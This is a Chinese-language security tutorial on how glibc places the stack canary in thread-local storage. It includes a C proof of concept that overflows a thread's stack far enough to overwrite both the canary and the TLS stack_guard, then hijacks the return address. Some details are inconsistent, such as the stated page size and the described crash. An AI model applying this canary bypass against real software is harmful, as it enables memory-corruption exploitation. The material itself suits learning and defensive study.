0x0 前置知识
我们都知道,在多线程下修改同一个全局变量会产生冲突,一般的解决方法是给全局变量加锁,根据用途和策略又有读锁和写锁之分。这样虽然解决了冲突的问题,但是不免过于麻烦。于是就引入了一种叫做 $\textcolor{orange}{\text{线程局部存储(Thread Local Storage)}}$ 的机制,即为每一个线程分配一个变量的实例,这种机制也可以避免上述的情况。该机制在不同的系统上实现的方式也不一样,本章只讨论在 $\textcolor{orange}{\text{Linux x86-64}}$ 架构中的实现。
0x1 原理探究
【环境】:Ubuntu18.04 Glibc2.27
Linux中调用 $\textcolor{cornflowerblue}{\text{pthread\_create()}}$ 函数的时候实际会调用到 $\textcolor{cornflowerblue}{\text{\_\_pthread\_create\_2\_1()}}$ 函数。该函数位于 $\textcolor{orange}{\text{glibc2.27/nptl/pthread\_create.c:608}}$
主要关注的如下代码段:
/*
 * Abridged excerpt of __pthread_create_2_1 from glibc 2.27
 * (nptl/pthread_create.c); each "..." line marks code elided by the article.
 *
 * Visible flow: allocate the thread descriptor `pd` via ALLOCATE_STACK,
 * fill it in from the attributes and from the creating thread, publish it
 * to the caller as the pthread_t handle, then start the thread with
 * create_thread.
 *
 * Returns `retval`: 0 on success, otherwise an error number (ENOMEM is
 * reported to the caller as EAGAIN).
 */
int
__pthread_create_2_1 (pthread_t *newthread, const pthread_attr_t *attr,
void *(*start_routine) (void *), void *arg)
{
STACK_VARIABLES;
const struct pthread_attr *iattr = (struct pthread_attr *) attr;
struct pthread_attr default_attr;
bool free_cpuset = false;
...
struct pthread *pd = NULL;
int err = ALLOCATE_STACK (iattr, &pd);// Key step: allocates the TCB (thread descriptor) for the new thread
int retval = 0;
if (__glibc_unlikely (err != 0))
{
/* Allocation failed: ENOMEM is mapped to EAGAIN, other errors pass through. */
retval = err == ENOMEM ? EAGAIN : err;
goto out;
}
#if TLS_TCB_AT_TP
/* Reference to the TCB itself. */
pd->header.self = pd;
/* Self-reference for TLS. */
pd->header.tcb = pd;
#endif
/* Record the entry point and its argument in the descriptor. */
pd->start_routine = start_routine;
pd->arg = arg;
/* Copy the thread attribute flags. */
struct pthread *self = THREAD_SELF;
/* The two scheduling flags come from the creating thread; every other
   flag comes from the requested attributes. */
pd->flags = ((iattr->flags & ~(ATTR_FLAG_SCHED_SET | ATTR_FLAG_POLICY_SET))
| (self->flags & (ATTR_FLAG_SCHED_SET | ATTR_FLAG_POLICY_SET)));
/* joinid points at the descriptor itself when the detach-state flag is set,
   and is NULL otherwise. */
pd->joinid = iattr->flags & ATTR_FLAG_DETACHSTATE ? pd : NULL;
/* The debug events are inherited from the parent. */
pd->eventbuf = self->eventbuf;
pd->schedpolicy = self->schedpolicy;
pd->schedparam = self->schedparam;
/* Copy the stack guard canary. */
/* NOTE(review): this is the step the article relies on -- it presumably
   stores the canary into the new thread's own descriptor; confirm against
   the macro definition. */
#ifdef THREAD_COPY_STACK_GUARD
THREAD_COPY_STACK_GUARD (pd);
#endif
/* Copy the pointer guard value. */
#ifdef THREAD_COPY_POINTER_GUARD
THREAD_COPY_POINTER_GUARD (pd);
#endif
/* Verify the sysinfo bits were copied in allocate_stack if needed. */
#ifdef NEED_DL_SYSINFO
CHECK_THREAD_SYSINFO (pd);
#endif
/* The descriptor pointer itself is handed back as the pthread_t handle. */
*newthread = (pthread_t) pd;
LIBC_PROBE (pthread_create, 4, newthread, attr, start_routine, arg);
atomic_increment (&__nptl_nthreads);// Count the new thread
bool stopped_start = false; bool thread_ran = false;
/* Start the thread. */
if (__glibc_unlikely (report_thread_creation (pd)))
{
/* Creation must be reported: request a stopped start, then queue a
   TD_CREATE event for this descriptor. */
stopped_start = true;
retval = create_thread (pd, iattr, &stopped_start,
STACK_VARIABLES_ARGS, &thread_ran);
if (retval == 0)
{
assert (stopped_start);
assert (pd->stopped_start);
pd->eventbuf.eventnum = TD_CREATE;
pd->eventbuf.eventdata = pd;
/* Enqueue the descriptor. */
/* Compare-and-exchange retry loop: link pd in front of the current
   __nptl_last_event and retry until the exchange succeeds. */
do
pd->nextevent = __nptl_last_event;
while (atomic_compare_and_exchange_bool_acq (&__nptl_last_event,
pd, pd->nextevent)
!= 0);
__nptl_create_event ();
}
}
else
retval = create_thread (pd, iattr, &stopped_start,
STACK_VARIABLES_ARGS, &thread_ran);
if (__glibc_unlikely (retval != 0))
{
/* Failure path.  If the thread already ran, only the stopped_start
   invariant is asserted here; otherwise the bookkeeping done above is
   rolled back. */
if (thread_ran)
assert (stopped_start);
else
{
atomic_decrement (&__nptl_nthreads);// Undo the thread-count increment made above
/* Wake one waiter on setxid_futex if its previous value was -2.
   NOTE(review): the meaning of -2 is not visible in this excerpt. */
if (__glibc_unlikely (atomic_exchange_acq (&pd->setxid_futex, 0)
== -2))
futex_wake (&pd->setxid_futex, 1, FUTEX_PRIVATE);
__deallocate_stack (pd);
}
/* We have to translate error codes. */
if (retval == ENOMEM)
retval = EAGAIN;
}
...
return retval;
}
源码中的注释是很丰富的,这里为了节省篇幅就删掉了。概括地说,创建线程的实质就是创建tcbhead_t,并设置tcbhead_t,并将TCB链入链表。
源码第14行的宏(即 ALLOCATE_STACK)使用了 $\textcolor{cornflowerblue}{\text{mmap()}}$ 创建tcbhead_t。
tcbhead_t结构体定义如下:
/*
 * Head of the thread control block, abridged by the article (the "……" line
 * stands for the remaining fields).
 *
 * Offsets noted below follow from the visible field order assuming 8-byte
 * pointers/uintptr_t and 4-byte int (x86-64 LP64) -- confirm on the target.
 */
typedef struct
{
void *tcb; /* Pointer to the TCB. Not necessarily the
thread descriptor used by libpthread. */
dtv_t *dtv; /* offset 0x08 */
void *self; /* Pointer to the thread descriptor. */
int multiple_threads; /* offset 0x18 */
int gscope_flag; /* offset 0x1c */
uintptr_t sysinfo; /* offset 0x20 */
uintptr_t stack_guard; /* stack canary, at offset 0x28 */
uintptr_t pointer_guard; /* offset 0x30 */
……
} tcbhead_t;
返回的tcbhead_t指针会作为新建线程的ID。
一开始,在 $\textcolor{cornflowerblue}{\text{\_\_libc\_start\_main()}}$ 函数中会初始化Canary,并保存在 $\textcolor{orange}{\text{gs:[0x14]}}$(32位)或 $\textcolor{orange}{\text{fs:[0x28]}}$(64位)中,fs寄存器会一直指向TLS结构。新建立的线程会通过 $\textcolor{orange}{\text{THREAD\_COPY\_STACK\_GUARD}}$ 宏,将Canary复制到如上结构的stack_guard中(上面源码的第48行,即 THREAD_COPY_STACK_GUARD (pd) 处)。在函数准备返回之前,就会读取栈上的Canary与stack_guard进行异或,结果为0则判定无溢出。因此,如果一个线程函数中存在栈溢出,则有可能通过同时覆盖Canary和stack_guard实现绕过。
溢出的长度 $\textcolor{orange}{\mathit{offset} = \mathit{ThreadId} + \mathtt{0x28} - \mathit{Buffer\_addr}}$,且 $\textcolor{orange}{\mathit{offset} < \mathit{page\_size}\,(\mathtt{0x4000})}$,溢出范围不能跨页!
0x2 实例测试
#include <asm/prctl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/*
 * Hijack target for the demo: prints a marker line and terminates the whole
 * process with status 0, so control never returns to the caller.
 *
 * Declared with a (void) parameter list so it is a real prototype; exit()
 * needs <stdlib.h>.
 */
void Bingo(void)
{
    puts("Bingo~");
    exit(0);
}
/*
 * arch_prctl() is called below without any visible prototype in the included
 * headers, so it is declared here explicitly.
 * NOTE(review): assumes the C library exports this symbol on x86-64 Linux --
 * confirm for the target libc.
 */
extern int arch_prctl(int code, unsigned long *addr);

/*
 * Thread start routine that deliberately smashes its own stack (demo only).
 *
 * Steps:
 *   1. Read the FS base of the current thread with ARCH_GET_FS.
 *   2. Take the current frame address; the slot just below it (frame[-1]) is
 *      treated as the canary slot.  NOTE(review): assumes the compiler emits
 *      a stack protector for this function and places the canary at rbp-8.
 *   3. Build a payload long enough to reach from that slot up to FS+0x30,
 *      filled with 'a', with the address of Bingo at payload offset 16
 *      (slot +8 is the saved frame pointer, slot +16 the return address in
 *      the usual x86-64 frame layout).
 *   4. Copy the payload over the stack starting at the canary slot, so both
 *      the on-stack canary and the word at FS+0x28 end up holding the same
 *      filler bytes.
 *
 * x is unused.  Returns NULL (also on early failure, before any overwrite).
 */
void *vul(void *x)
{
    (void)x;

    unsigned long fs_base = 0;
    if (arch_prctl(ARCH_GET_FS, &fs_base) != 0) {
        perror("arch_prctl");
        return NULL;
    }

    unsigned long *frame = __builtin_frame_address(0);
    unsigned long *canary_slot = &frame[-1];

    /* %p already prints a 0x prefix with glibc, so none is added by hand. */
    printf("FS:%p\n", (void *)fs_base);
    printf("Canary_addr:%p \nCanary_val:0x%lx\n",
           (void *)canary_slot, *canary_slot);

    /* Distance from the canary slot to the end of the word at FS+0x28. */
    unsigned long offset = fs_base - (unsigned long)canary_slot + 0x30;
    printf("offset:%lu\n", offset);

    char *buf = malloc(offset);
    if (buf == NULL) {
        perror("malloc");
        return NULL;
    }

    void (*target)(void) = Bingo;
    memset(buf, 'a', offset);
    memcpy(&buf[16], &target, sizeof target);

    /* Intentional out-of-bounds write: this is the overflow being shown. */
    memcpy(canary_slot, buf, offset);

    /* buf is deliberately not freed: everything up to FS+0x30 has just been
       overwritten, so no further library calls are made from here. */
    return NULL;
}
/*
 * Demo driver: starts one thread running vul(), prints the thread handle as
 * a pointer, and waits for the thread to finish.
 *
 * argc, argv and envp are unused.
 * Returns 0 on success, 1 if the thread cannot be created or joined.
 */
int main(int argc, char **argv, char **envp)
{
    (void)argc;
    (void)argv;
    (void)envp;

    pthread_t one;
    void *val = NULL;

    /* pthread functions return the error number directly, not via errno. */
    int rc = pthread_create(&one, NULL, &vul, NULL);
    if (rc != 0) {
        fprintf(stderr, "pthread_create failed: %d\n", rc);
        return 1;
    }

    /* NOTE(review): printing the handle as a pointer assumes pthread_t is an
       integer type holding an address, as on Linux/glibc. */
    printf("Thread Id:%p\n", (void *)one);

    rc = pthread_join(one, &val);
    if (rc != 0) {
        fprintf(stderr, "pthread_join failed: %d\n", rc);
        return 1;
    }
    return 0;
}
- $\textcolor{cornflowerblue}{\text{\_\_builtin\_frame\_address(0)}}$:获取当前函数的栈帧地址(即当前栈帧中的rbp或ebp)
- $\textcolor{cornflowerblue}{\text{\_\_builtin\_frame\_address(1)}}$:获取调用者(上一层函数)的栈帧地址;若要获取函数返回地址,应使用 $\textcolor{cornflowerblue}{\text{\_\_builtin\_return\_address(0)}}$
可见虽然成功劫持了程序流,但是在执行完目标函数返回时由于前面的溢出操作导致栈被破坏,所以触发段错误。这也提醒了一点——当我们使用ROP技术时应考虑栈迁移。